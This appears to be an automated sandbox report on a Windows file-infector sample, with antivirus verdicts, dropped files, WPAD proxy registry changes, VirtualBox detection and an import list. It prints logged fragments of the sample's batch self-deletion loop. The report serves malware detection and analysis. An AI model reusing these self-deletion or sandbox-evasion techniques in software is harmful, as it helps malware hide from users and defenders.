6.4
High risk

e11ef3018a3163e4f03ec0a5ec6f300817c5f44cc6ecf86dc2d0aeb4a7327835

3b6482c199b9581ad3d0da6df9edff66.exe

Analysis duration: 80s
Last analyzed:
File size: 10.3MB
Static detections / dynamic detections (tags): A + W32 AI SCORE=85 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI
Hawkeye engine
Not detected: no Hawkeye engine results are available for this sample
Static verdict
Antivirus engines
Engine       Result                            Scan date  Engine version
Alibaba      Virus:Win32/Nimnul.356d27b6       20190527   0.3.0.5
Baidu        Win32.Virus.Otwycal.d             20190318   1.0.0.2
Avast        Other:Malware-gen [Trj]           20201210   21.1.5827.0
Tencent      Virus.Win32.Loader.aab            20201211   1.0.0.1
Kingsoft     -                                 20201211   2017.9.26.565
McAfee       W32/Kudj                          20201211   6.0.6.653
CrowdStrike  win/malicious_confidence_60% (W)  20190702   1.0
Static indicators
Command line console output was observed (50 out of 502 events)
Time  API  Arguments  Status  Return  Repeated
1619360291.231999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.247999  WriteConsoleW  buffer: del  console_handle: 0x00000007  success 1 0
1619360291.262999  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.294999  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe  console_handle: 0x00000007  success 1 0
1619360291.294999  WriteConsoleW  buffer: 拒绝访问。  console_handle: 0x0000000b  success 1 0
1619360291.309999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.309999  WriteConsoleW  buffer: if  console_handle: 0x00000007  success 1 0
1619360291.309999  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.309999  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success 1 0
1619360291.325999  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success 1 0
1619360291.341999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.341999  WriteConsoleW  buffer: del  console_handle: 0x00000007  success 1 0
1619360291.341999  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.356999  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe  console_handle: 0x00000007  success 1 0
1619360291.356999  WriteConsoleW  buffer: 拒绝访问。  console_handle: 0x0000000b  success 1 0
1619360291.372999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.372999  WriteConsoleW  buffer: if  console_handle: 0x00000007  success 1 0
1619360291.387999  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.387999  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success 1 0
1619360291.387999  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success 1 0
1619360291.403999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.403999  WriteConsoleW  buffer: del  console_handle: 0x00000007  success 1 0
1619360291.403999  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.450999  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe  console_handle: 0x00000007  success 1 0
1619360291.466999  WriteConsoleW  buffer: 拒绝访问。  console_handle: 0x0000000b  success 1 0
1619360291.466999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.481999  WriteConsoleW  buffer: if  console_handle: 0x00000007  success 1 0
1619360291.481999  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.481999  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success 1 0
1619360291.481999  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success 1 0
1619360291.497999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.497999  WriteConsoleW  buffer: del  console_handle: 0x00000007  success 1 0
1619360291.497999  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.512999  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe  console_handle: 0x00000007  success 1 0
1619360291.512999  WriteConsoleW  buffer: 拒绝访问。  console_handle: 0x0000000b  success 1 0
1619360291.528999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.544999  WriteConsoleW  buffer: if  console_handle: 0x00000007  success 1 0
1619360291.544999  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.544999  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success 1 0
1619360291.559999  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success 1 0
1619360291.575999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.575999  WriteConsoleW  buffer: del  console_handle: 0x00000007  success 1 0
1619360291.575999  WriteConsoleW  buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.637999  WriteConsoleW  buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe  console_handle: 0x00000007  success 1 0
1619360291.637999  WriteConsoleW  buffer: 拒绝访问。  console_handle: 0x0000000b  success 1 0
1619360291.653999  WriteConsoleW  buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>  console_handle: 0x00000007  success 1 0
1619360291.669999  WriteConsoleW  buffer: if  console_handle: 0x00000007  success 1 0
1619360291.684999  WriteConsoleW  buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"  console_handle: 0x00000007  success 1 0
1619360291.684999  WriteConsoleW  buffer: goto  console_handle: 0x00000007  success 1 0
1619360291.684999  WriteConsoleW  buffer: :DELFILE  console_handle: 0x00000007  success 1 0
This executable has a PDB path (1 event)
pdb_path C:\Jenkins\jobs\miktex-2.9\workspace\build-x86\binlib\update_mfc.pdb
Tries to locate where the browsers are installed (1 event)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)
section .gfids
section .giats
section .00cfg
section \x90;?\xdd\xa3u\x9f
The file contains an unknown PE resource name possibly indicative of a packer (1 event)
resource name AVI
Behavioral verdict
Dynamic indicators
Creates executable files on the filesystem (20 events)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\11502C29.exe
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3FBA68D2.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\09692C9B.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\05A86F06.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\73E925BC.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\KpKRa.exe
Drops a binary and executes it (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat
Drops an executable to the user AppData folder (1 event)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\KpKRa.exe
A process created a hidden window (1 event)
Time  API  Arguments  Status  Return  Repeated
1619360290.778999  ShellExecuteExW  parameters:  filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat  filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\07231522.bat  show_type: 0  success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 event)
Time  API  Arguments  Status  Return  Repeated
1619360271.747999  GetAdaptersAddresses  flags: 0  family: 0  failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 event)
entropy 6.934223651009754 section {'size_of_data': '0x00004200', 'virtual_address': '0x00a5c000', 'entropy': 6.934223651009754, 'name': '\\x90;?\\xdd\\xa3u\\x9f', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
Network communication
Communicates with host for which no DNS query was performed (1 event)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 events)
Time  API  Arguments  Status  Return  Repeated
1619360274.325999  RegSetValueExA  key_handle: 0x000003ec  value: 1  regkey_r: WpadDecisionReason  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason  success 0 0
1619360274.325999  RegSetValueExA  key_handle: 0x000003ec  value: `Ê%*æ9×  regkey_r: WpadDecisionTime  reg_type: 3 (REG_BINARY)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime  success 0 0
1619360274.325999  RegSetValueExA  key_handle: 0x000003ec  value: 3  regkey_r: WpadDecision  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision  success 0 0
1619360274.325999  RegSetValueExW  key_handle: 0x000003ec  value: 网络 2  regkey_r: WpadNetworkName  reg_type: 1 (REG_SZ)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName  success 0 0
1619360274.325999  RegSetValueExA  key_handle: 0x000003e8  value: 1  regkey_r: WpadDecisionReason  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason  success 0 0
1619360274.325999  RegSetValueExA  key_handle: 0x000003e8  value: `Ê%*æ9×  regkey_r: WpadDecisionTime  reg_type: 3 (REG_BINARY)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime  success 0 0
1619360274.325999  RegSetValueExA  key_handle: 0x000003e8  value: 3  regkey_r: WpadDecision  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision  success 0 0
1619360274.356999  RegSetValueExW  key_handle: 0x000002f8  value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}  regkey_r: WpadLastNetwork  reg_type: 1 (REG_SZ)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x00000408  value: 1  regkey_r: WpadDecisionReason  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x00000408  value: Ô-æ9×  regkey_r: WpadDecisionTime  reg_type: 3 (REG_BINARY)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x00000408  value: 0  regkey_r: WpadDecision  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision  success 0 0
1619360279.231999  RegSetValueExW  key_handle: 0x00000408  value: 网络 2  regkey_r: WpadNetworkName  reg_type: 1 (REG_SZ)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x0000040c  value: 1  regkey_r: WpadDecisionReason  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x0000040c  value: Ô-æ9×  regkey_r: WpadDecisionTime  reg_type: 3 (REG_BINARY)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime  success 0 0
1619360279.231999  RegSetValueExA  key_handle: 0x0000040c  value: 0  regkey_r: WpadDecision  reg_type: 4 (REG_DWORD)  regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision  success 0 0
Detects VirtualBox through the presence of a file (5 events)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 58 AntiVirus engines on VirusTotal as malicious (50 out of 58 events)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.3b6482c199b9581a
ALYac Win32.VJadtre.3
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
AegisLab Virus.Win32.Nimnul.m1R5
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.356d27b6
K7GW Virus ( 0040f7441 )
Arcabit Win32.VJadtre.3
BitDefenderTheta AI:FileInfector.991137D00F
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
Baidu Win32.Virus.Otwycal.d
TrendMicro-HouseCall PE_WAPOMI.BM
Paloalto generic.ml
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
Avast Other:Malware-gen [Trj]
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Kudj.vm
SentinelOne Static AI - Malicious PE
Emsisoft Win32.VJadtre.3 (B)
APEX Malicious
Jiangmin Win32/Nimnul.f
MaxSecure Virus.Nimnul.F
Avira W32/Jadtre.B
MAX malware (ai score=85)
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03042201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
AhnLab-V3 Win32/VJadtre.Gen
McAfee W32/Kudj
TACHYON Virus/W32.Ramnit.C
VBA32 Virus.Nimnul.19209
Zoner Virus.Win32.23755
Visual analysis
Binary image
No binary image: no binary visualization image was generated for this sample
Runtime screenshots
No runtime screenshots: no screenshots were captured while this sample ran
PE Compile Time: 2016-08-09 03:27:57

Imports

Library WININET.dll:
0xd84208 InternetCrackUrlW
Library WS2_32.dll:
0xd8431c recv
0xd84320 ntohs
0xd84324 ntohl
0xd84328 listen
0xd8432c inet_addr
0xd84330 htons
0xd84334 recvfrom
0xd84338 getsockopt
0xd8433c ioctlsocket
0xd84340 send
0xd84344 sendto
0xd84348 setsockopt
0xd8434c shutdown
0xd84350 socket
0xd84354 freeaddrinfo
0xd84358 getaddrinfo
0xd8435c getservbyname
0xd84360 getsockname
0xd84364 getpeername
0xd84368 gethostbyname
0xd8436c WSAStartup
0xd84370 WSACleanup
0xd84374 WSAGetLastError
0xd84378 getnameinfo
0xd84380 WSARecv
0xd84384 WSASend
0xd84388 gethostname
0xd8438c WSASetLastError
0xd84390 select
0xd84394 WSAIoctl
0xd84398 connect
0xd8439c closesocket
0xd843a0 bind
0xd843a4 accept
0xd843a8 htonl
0xd843ac __WSAFDIsSet
Library MSWSOCK.dll:
0xd83a20 TransmitFile
Library RPCRT4.dll:
0xd83bc4 UuidCreate
Library ODBC32.dll:
0xd83a50
0xd83a54
0xd83a58
0xd83a5c
0xd83a60
0xd83a64
0xd83a68
Library SHFOLDER.dll:
0xd83c60 SHGetFolderPathW
Library SHLWAPI.dll:
0xd83c90 SHDeleteKeyW
0xd83c94 PathRelativePathToW
0xd83c98 PathCanonicalizeA
0xd83c9c AssocQueryKeyW
0xd83ca0 PathFindFileNameW
0xd83ca8 PathIsUNCW
0xd83cac PathStripToRootW
0xd83cb0 StrFormatKBSizeW
0xd83cb4 PathFindExtensionW
0xd83cb8 PathRemoveFileSpecW
Library KERNEL32.dll:
0xd83468 Module32First
0xd8346c Module32Next
0xd83474 GetConsoleOutputCP
0xd83478 SleepEx
0xd8347c VerSetConditionMask
0xd83480 GetModuleHandleA
0xd83484 GetSystemDirectoryA
0xd83488 VerifyVersionInfoA
0xd8348c Heap32Next
0xd83490 Heap32First
0xd83494 Heap32ListNext
0xd83498 Heap32ListFirst
0xd8349c GetTickCount
0xd834a0 GetSystemInfo
0xd834a4 GlobalMemoryStatus
0xd834ac VirtualUnlock
0xd834b0 VirtualLock
0xd834b4 CreateNamedPipeA
0xd834b8 UnlockFileEx
0xd834bc LockFileEx
0xd834c0 UnlockFile
0xd834c4 SetEndOfFile
0xd834c8 GetVersionExA
0xd834cc CreateFileA
0xd834d0 GetModuleFileNameA
0xd834d4 LoadLibraryA
0xd834d8 TerminateProcess
0xd834dc CreateSemaphoreA
0xd834e0 ReleaseSemaphore
0xd834e4 SwitchToThread
0xd83504 GetDriveTypeA
0xd83508 PeekNamedPipe
0xd8350c FlushFileBuffers
0xd83510 ReadFile
0xd83514 WriteFile
0xd83518 CancelIo
0xd8351c SetFilePointer
0xd83520 DeviceIoControl
0xd83524 SetStdHandle
0xd83528 GetOverlappedResult
0xd83530 GetFileTime
0xd83534 GetFileType
0xd8353c CreateEventA
0xd83540 ReleaseMutex
0xd83544 SetEvent
0xd83550 TlsSetValue
0xd83554 TlsGetValue
0xd8356c GetCommandLineW
0xd83570 TlsFree
0xd83574 TlsAlloc
0xd83580 GlobalFree
0xd83584 Thread32Next
0xd83594 OutputDebugStringW
0xd83598 InterlockedExchange
0xd8359c OpenFileMappingW
0xd835a0 CreateFileMappingW
0xd835a4 UnmapViewOfFile
0xd835a8 FlushViewOfFile
0xd835ac MapViewOfFile
0xd835b0 LoadLibraryW
0xd835b4 FreeLibrary
0xd835b8 Process32NextW
0xd835bc Process32FirstW
0xd835c4 SearchPathW
0xd835c8 CreateProcessW
0xd835cc CreatePipe
0xd835d0 GetStdHandle
0xd835d4 WaitForSingleObject
0xd835d8 GetCurrentThreadId
0xd835dc GetExitCodeProcess
0xd835e0 GetCurrentProcessId
0xd835e4 OpenProcess
0xd835ec GetVersion
0xd835f0 CreateDirectoryW
0xd835f4 GetDriveTypeW
0xd835f8 FormatMessageW
0xd835fc FormatMessageA
0xd83600 LocalFree
0xd83604 LocalAlloc
0xd83608 GetVolumePathNameA
0xd8360c GetVersionExW
0xd83610 GetFullPathNameW
0xd83614 GetModuleHandleW
0xd83618 GetNativeSystemInfo
0xd8361c SetLastError
0xd83620 GetProcAddress
0xd83624 CreateHardLinkW
0xd83628 CopyFileW
0xd8362c FindFirstFileW
0xd83630 DeleteFileW
0xd83634 SetFileAttributesW
0xd83638 SetFileTime
0xd8363c GetFileSize
0xd83640 FindNextFileW
0xd83644 FindFirstFileExW
0xd83648 FindClose
0xd8364c GetFileAttributesW
0xd83650 RemoveDirectoryW
0xd83654 GetLongPathNameW
0xd83658 MoveFileExW
0xd8365c CreateFileW
0xd83664 Sleep
0xd83668 GetCurrentThread
0xd8366c GetVolumePathNameW
0xd83670 GetTempFileNameW
0xd83674 GetTempPathW
0xd83678 DebugBreak
0xd8367c GetModuleFileNameW
0xd83680 DuplicateHandle
0xd83684 CloseHandle
0xd83690 ResumeThread
0xd83694 GetCurrentProcess
0xd83698 WideCharToMultiByte
0xd836a0 FindResourceW
0xd836a4 GetLogicalDrives
0xd836a8 SizeofResource
0xd836ac Thread32First
0xd836b0 Process32Next
0xd836b8 Process32First
0xd836bc LoadResource
0xd836c0 SetErrorMode
0xd836c4 LockResource
0xd836c8 MultiByteToWideChar
0xd836d4 GetLastError
0xd836d8 RaiseException
0xd836dc GetProcessHeap
0xd836e0 HeapSize
0xd836e4 HeapFree
0xd836e8 HeapReAlloc
0xd836ec HeapAlloc
0xd836f0 HeapDestroy
0xd836f4 DecodePointer
0xd836f8 LockFile
0xd83700 UnregisterWaitEx
0xd83704 QueryDepthSList
0xd83710 VirtualFree
0xd83714 GetThreadTimes
0xd83718 UnregisterWait
0xd8373c GetThreadPriority
0xd83740 SignalObjectAndWait
0xd83744 CreateTimerQueue
0xd8374c FindNextFileA
0xd83750 FindFirstFileExA
0xd83754 GlobalAlloc
0xd83758 GlobalSize
0xd8375c GlobalLock
0xd83760 GlobalUnlock
0xd83764 MulDiv
0xd83768 OutputDebugStringA
0xd8376c EncodePointer
0xd83770 GetSystemDirectoryW
0xd83774 FreeResource
0xd83778 LoadLibraryExW
0xd8377c GlobalDeleteAtom
0xd83780 lstrcmpW
0xd83784 GlobalAddAtomW
0xd83788 GlobalFindAtomW
0xd8378c VirtualProtect
0xd83790 CreateEventW
0xd83794 SetThreadPriority
0xd83798 SuspendThread
0xd8379c CreateMutexW
0xd837a0 CreateSemaphoreW
0xd837a4 lstrcmpA
0xd837a8 CompareStringA
0xd837b8 GlobalReAlloc
0xd837bc GlobalHandle
0xd837c0 LocalReAlloc
0xd837c4 GlobalGetAtomNameW
0xd837c8 GetAtomNameW
0xd837cc GetThreadLocale
0xd837d0 GlobalFlags
0xd837d4 lstrcpyW
0xd837d8 CompareStringW
0xd837dc GetLocaleInfoW
0xd837e8 FindResourceExW
0xd837ec GetShortPathNameW
0xd837f0 lstrcmpiW
0xd837f4 MoveFileW
0xd837f8 GetStringTypeExW
0xd837fc VerifyVersionInfoW
0xd83804 GetFileSizeEx
0xd8380c GetProfileIntW
0xd83810 GetDiskFreeSpaceW
0xd83814 ReplaceFileW
0xd83818 GetUserDefaultLCID
0xd8381c LocalLock
0xd83820 LocalUnlock
0xd83824 ResetEvent
0xd83838 InitializeSListHead
0xd8383c IsDebuggerPresent
0xd83840 GetStartupInfoW
0xd83844 GetStringTypeW
0xd83848 GetExitCodeThread
0xd83850 QueueUserWorkItem
0xd83858 LCMapStringW
0xd8385c GetCPInfo
0xd83860 RtlUnwind
0xd8386c ExitProcess
0xd83870 GetModuleHandleExW
0xd83874 GetFullPathNameA
0xd83884 HeapValidate
0xd83888 CreateProcessA
0xd8388c GetConsoleMode
0xd83890 ReadConsoleW
0xd83894 GetConsoleCP
0xd83898 CreateThread
0xd8389c ExitThread
0xd838a8 SetFilePointerEx
0xd838ac GetCommandLineA
0xd838b4 VirtualAlloc
0xd838b8 VirtualQuery
0xd838bc GetACP
0xd838c0 GetDateFormatW
0xd838c4 GetTimeFormatW
0xd838c8 IsValidLocale
0xd838cc EnumSystemLocalesW
0xd838d0 WriteConsoleW
0xd838d4 IsValidCodePage
0xd838d8 GetOEMCP
Library USER32.dll:
0xd83cf0 AdjustWindowRectEx
0xd83cf4 ScreenToClient
0xd83cf8 MapWindowPoints
0xd83cfc GetSysColor
0xd83d00 CopyRect
0xd83d04 EqualRect
0xd83d08 PtInRect
0xd83d0c SetWindowLongW
0xd83d10 GetClassLongW
0xd83d14 GetClassNameW
0xd83d18 GetTopWindow
0xd83d1c GetLastActivePopup
0xd83d20 SetWindowsHookExW
0xd83d24 UnhookWindowsHookEx
0xd83d28 CallNextHookEx
0xd83d2c SetScrollInfo
0xd83d30 GetScrollInfo
0xd83d34 WinHelpW
0xd83d38 MonitorFromWindow
0xd83d3c GetMonitorInfoW
0xd83d40 ShowWindow
0xd83d44 MoveWindow
0xd83d48 SetDlgItemInt
0xd83d4c GetDlgItemInt
0xd83d50 SetDlgItemTextW
0xd83d54 GetDlgItemTextW
0xd83d58 CheckDlgButton
0xd83d5c CheckRadioButton
0xd83d60 IsDlgButtonChecked
0xd83d64 SendDlgItemMessageW
0xd83d68 IsWindowEnabled
0xd83d6c ScrollWindowEx
0xd83d70 SetWindowTextW
0xd83d74 IsDialogMessageW
0xd83d7c EndDialog
0xd83d80 GetNextDlgTabItem
0xd83d84 GetActiveWindow
0xd83d88 GetDesktopWindow
0xd83d8c LoadMenuW
0xd83d94 GetAsyncKeyState
0xd83d98 MapDialogRect
0xd83d9c GetMessageW
0xd83da0 TranslateMessage
0xd83da8 GetKeyNameTextW
0xd83dac MapVirtualKeyW
0xd83db0 DrawTextW
0xd83db4 DrawTextExW
0xd83db8 GrayStringW
0xd83dbc TabbedTextOutW
0xd83dc0 GetWindowDC
0xd83dc4 ClientToScreen
0xd83dc8 FillRect
0xd83dcc PostQuitMessage
0xd83dd0 ShowOwnedPopups
0xd83dd4 SetCursor
0xd83dd8 GetSysColorBrush
0xd83ddc LoadCursorW
0xd83de4 TrackMouseEvent
0xd83de8 InvalidateRect
0xd83dec InflateRect
0xd83df0 DestroyIcon
0xd83df4 LoadImageW
0xd83df8 DestroyMenu
0xd83dfc GetMenuItemInfoW
0xd83e00 CopyImage
0xd83e04 GetDialogBaseUnits
0xd83e08 IntersectRect
0xd83e0c DeleteMenu
0xd83e10 SetTimer
0xd83e14 KillTimer
0xd83e18 CharUpperW
0xd83e1c GetNextDlgGroupItem
0xd83e20 SetCapture
0xd83e24 ReleaseCapture
0xd83e28 WindowFromPoint
0xd83e2c DrawFocusRect
0xd83e30 IsRectEmpty
0xd83e34 DrawIconEx
0xd83e38 GetIconInfo
0xd83e3c MessageBeep
0xd83e40 GetWindowRect
0xd83e44 HideCaret
0xd83e48 InvertRect
0xd83e4c NotifyWinEvent
0xd83e50 CreatePopupMenu
0xd83e54 GetMenuDefaultItem
0xd83e5c EnumDisplayMonitors
0xd83e60 SetClassLongW
0xd83e64 SetWindowRgn
0xd83e68 SetParent
0xd83e6c OpenClipboard
0xd83e70 CloseClipboard
0xd83e74 SetClipboardData
0xd83e78 EmptyClipboard
0xd83e7c DrawStateW
0xd83e80 DrawEdge
0xd83e84 DrawFrameControl
0xd83e88 IsZoomed
0xd83e8c GetSystemMenu
0xd83e90 BringWindowToTop
0xd83e94 SetCursorPos
0xd83e98 CopyIcon
0xd83e9c FrameRect
0xd83ea0 DrawIcon
0xd83ea4 UnionRect
0xd83ea8 UpdateLayeredWindow
0xd83eac MonitorFromPoint
0xd83eb0 LoadAcceleratorsW
0xd83eb8 InsertMenuItemW
0xd83ebc GetMenuBarInfo
0xd83ec0 UnpackDDElParam
0xd83ec4 ReuseDDElParam
0xd83ec8 GetComboBoxInfo
0xd83ecc PostThreadMessageW
0xd83ed0 WaitMessage
0xd83ed4 GetKeyboardLayout
0xd83ed8 IsCharLowerW
0xd83edc MapVirtualKeyExW
0xd83ee0 ToUnicodeEx
0xd83ee4 GetKeyboardState
0xd83ef4 SetRect
0xd83ef8 LockWindowUpdate
0xd83efc SetMenuDefaultItem
0xd83f00 GetDoubleClickTime
0xd83f04 ModifyMenuW
0xd83f0c CharUpperBuffW
0xd83f14 GetUpdateRect
0xd83f18 EnumChildWindows
0xd83f1c DrawMenuBar
